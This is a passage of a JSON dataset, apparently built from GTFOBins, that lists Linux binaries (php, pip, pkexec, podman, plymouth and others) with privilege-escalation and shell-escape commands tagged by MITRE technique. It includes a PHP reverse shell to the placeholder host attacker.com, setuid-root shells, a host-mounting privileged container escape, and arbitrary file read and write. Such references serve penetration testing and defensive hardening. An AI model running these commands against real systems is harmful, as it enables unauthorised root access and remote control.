been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-read:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-read:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"php -r 'readfile(\"/path/to/input-file\");'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-write:0:sudo","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-write:0:suid","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:file-write:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"php -r 'file_put_contents(\"/path/to/output-file\", \"DATA\");'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:reverse-shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:reverse-shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:reverse-shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"php -r '$sock=fsockopen(\"attacker.com\",12345);exec(\"/bin/sh -i 0<&3 1>&3 2>&3\");'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'system(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:1:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'passthru(\"/bin/sh -i\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); $h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:2:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r '$h=@popen(\"/bin/sh -i\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:capabilities","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'posix_setuid(0); pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:sudo","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:suid","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\", [\"-p\"]);'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:shell:3:unprivileged","toolId":"gtfo:php","toolName":"php","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"php -r 'pcntl_exec(\"/bin/sh\");'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:upload:0:sudo","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:upload:0:suid","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:php:upload:0:unprivileged","toolId":"gtfo:php","toolName":"php","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"php -S 0.0.0.0:80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/php/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:file-read:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:file-read:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:file-read:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pic /path/to/input-file","description":"The output is prefixed with some content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:shell:0:sudo","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:shell:0:suid","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pic:shell:0:unprivileged","toolId":"gtfo:pic","toolName":"pic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pic -U\n.PS\nsh X sh X","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pidstat:shell:0:sudo","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pidstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pidstat:shell:0:suid","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pidstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pidstat:shell:0:unprivileged","toolId":"gtfo:pidstat","toolName":"pidstat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pidstat -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pidstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:inherit:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:inherit:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\npip install --break-system-packages .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```\n\nThe `--break-system-packages` flag can be omitted in older systems.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:shell:0:sudo","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pip:shell:0:unprivileged","toolId":"gtfo:pip","toolName":"pip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pip config --editor '/bin/sh -s' edit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pipx:inherit:0:sudo","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pipx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pipx:inherit:0:unprivileged","toolId":"gtfo:pipx","toolName":"pipx","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/file.py\npipx run /path/to/file.py","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pipx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pkexec:shell:0:sudo","toolId":"gtfo:pkexec","toolName":"pkexec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pkexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkexec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pkg:command:0:sudo","toolId":"gtfo:pkg","toolName":"pkg","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"pkg install -y --no-repo-update ./x-1.0.txz","description":"Generate the FreeBSD package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t freebsd -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:plymouth:shell:0:sudo","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/plymouth/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:plymouth:shell:0:suid","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command='/bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/plymouth/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:plymouth:shell:0:unprivileged","toolId":"gtfo:plymouth","toolName":"plymouth","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"plymouth ask-for-password --prompt=x --command=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/plymouth/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:podman:shell:0:sudo","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/podman/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:podman:shell:0:unprivileged","toolId":"gtfo:podman","toolName":"podman","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt /bin/sh","description":"This requires an actual image to be available (e.g., `alpine`) downloading it if not present.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/podman/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:poetry:inherit:0:sudo","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/poetry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:poetry:inherit:0:unprivileged","toolId":"gtfo:poetry","toolName":"poetry","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/poetry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:posh:shell:0:sudo","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/posh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 